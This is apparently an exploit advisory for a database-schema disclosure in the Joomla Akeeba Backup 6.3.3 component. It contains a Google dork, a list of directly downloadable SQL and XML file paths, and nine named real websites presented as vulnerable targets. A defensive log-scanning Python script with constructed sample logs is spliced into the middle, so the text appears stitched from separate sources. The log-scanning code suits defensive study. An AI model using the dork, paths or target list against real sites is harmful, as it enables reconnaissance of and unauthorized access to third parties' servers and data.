###################################################################################
# Exploit Title : Joomla Akeeba Backup Components 6.3.3 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : akeebabackup.com
# Software Information Link : extensions.joomla.org/extension/akeeba-backup/
# Software Download Link : akeebabackup.com/download/akeeba-backup/6-3-3/pkg_akeeba-6-3-3-core-zip.zip
# Software Affected Version : 6.3.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_akeeba/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#                      CWE-23 - [ Relative Path Traversal ]
#                      CWE-200 - [ Information Exposure ]
#                      CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
###################################################################################
# Description :
**************
Akeeba Backup Core is the most widely used open-source backup component for the Joomla! CMS.
Its mission is simple: create a site backup that can be restored on any Joomla!-capable server,
making it ideal not only for backups but also for site transfers or even deploying sites to your
clients' servers. Akeeba Backup creates a full backup of your site in a single archive.
The archive contains all the files, a database snapshot and an installer similar in function
to the standard Joomla! installer. The backup and restore process is AJAX powered
to avoid server timeouts, even with huge sites. Alternatively, you can make a backup of
only your database, or only your files. Akeeba Backup is the reliable, easy to use,
open source backup solution for your Joomla! site.
###################################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_akeeba/sql/common/mysql.xml
/administrator/components/com_akeeba/sql/common/postgresql.xml
/administrator/components/com_akeeba/sql/common/sqlsrv.xml
/administrator/components/com_akeeba/sql/install/mysql/install.sql
/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
/administrator/components/com_akeeba/sql/install/sqlazure/install.sql
/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
/administrator/components/com_akeeba/sql/updates/mysql/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/mysql/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/mysql/3.6.0-2012-07-31.sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/sqlazure/3.6.0-2012-07-31.sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-2012-03-27.sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_akeeba/sql/updates/sqlsrv/3.6.0-2012-07-31.sql
###################################################################################
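From the defender's side, the paths listed above are straightforward to watch for in web-server logs. The Python script below is an added example, not part of the original paste or of the Akeeba project: it parses access-log lines in the common Apache/nginx "combined" format (an assumption about the log format in use), normalizes each requested path (percent-decoding it and collapsing `..` segments so encoded traversal variants are caught, which is the CWE-23 angle in the header), and flags any request for a `.sql` or `.xml` file under `/administrator/components/com_akeeba/sql/`. The log lines, IP addresses and timestamps are constructed for the example; the function names and the `served` flag are assumptions of this example.

```python
import posixpath
import re
from typing import Dict, List
from urllib.parse import unquote

# Directory whose contents the advisory above lists as directly downloadable.
AKEEBA_SQL_PREFIX = "/administrator/components/com_akeeba/sql/"

# File types named in the advisory's path list.
FLAGGED_EXTENSIONS = (".sql", ".xml")

# Apache/nginx "combined" log format (assumption: this is the format in use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2019:10:01:02 +0000] "GET /administrator/components/com_akeeba/sql/install/mysql/install.sql HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2019:10:01:03 +0000] "GET /joomla/administrator/components/com_akeeba/sql/common/mysql.xml HTTP/1.1" 200 1033 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2019:10:01:04 +0000] "GET /images/../administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql HTTP/1.1" 403 199 "-" "curl/7.64.0"',
    '198.51.100.4 - - [19/Jan/2019:10:02:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9921 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Jan/2019:10:02:05 +0000] "GET /administrator/components/com_akeeba/sql/install/mysql/install.sql?x=1 HTTP/1.1" 404 150 "-" "python-requests/2.21"',
]


def normalize_path(raw: str) -> str:
    """Strip the query string, percent-decode, and collapse '.' / '..' segments."""
    path_only = raw.split("?", 1)[0]
    return posixpath.normpath(unquote(path_only))


def is_akeeba_sql_path(raw_path: str) -> bool:
    """True if the request targets a schema file under the com_akeeba sql directory.

    The prefix is searched anywhere in the path so installs under a
    sub-directory (e.g. /joomla/administrator/...) are also matched.
    """
    norm = normalize_path(raw_path)
    return AKEEBA_SQL_PREFIX in norm and norm.lower().endswith(FLAGGED_EXTENSIONS)


def find_schema_disclosures(log_lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request for a flagged file, whether or not it was served."""
    findings: List[Dict[str, object]] = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not is_akeeba_sql_path(m["path"]):
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "path": normalize_path(m["path"]),
            "status": status,
            # 200 means the web server actually handed the file out;
            # 403/404 means an access rule (or removal) already blocks it.
            "served": status == 200,
        })
    return findings


def summarize(findings: List[Dict[str, object]]) -> Dict[str, object]:
    """Aggregate findings into the numbers an analyst wants first."""
    return {
        "attempts": len(findings),
        "served": sum(1 for f in findings if f["served"]),
        "source_ips": sorted({str(f["ip"]) for f in findings}),
    }


if __name__ == "__main__":
    results = find_schema_disclosures(SAMPLE_LOG)
    for f in results:
        print(f"{f['ip']:15} {f['status']} {'SERVED ' if f['served'] else 'blocked'} {f['path']}")
    print(summarize(results))
```

Any finding with `served` set to true means the file was actually disclosed and the `sql` directory should be denied at the web-server level (or the files removed from the deployed install); findings with 403 or 404 show that a rule is already in place and the log entry is only reconnaissance worth correlating by source address.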
# Example Vulnerable Sites :
*************************
[+] pentictonwebdesign.com/sites/stop/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
[+] bainhotte.com/a%20sup/administrator/components/com_akeeba/sql/install/mysql/install.sql
[+] alsys.ma/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
[+] farwestpizza.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] leschaumieresdekerguan.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] desertlearningcenter.org/joomla/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] staszickutno.pl/staszickutno.pl/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
[+] prehisto.ch/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
###################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################################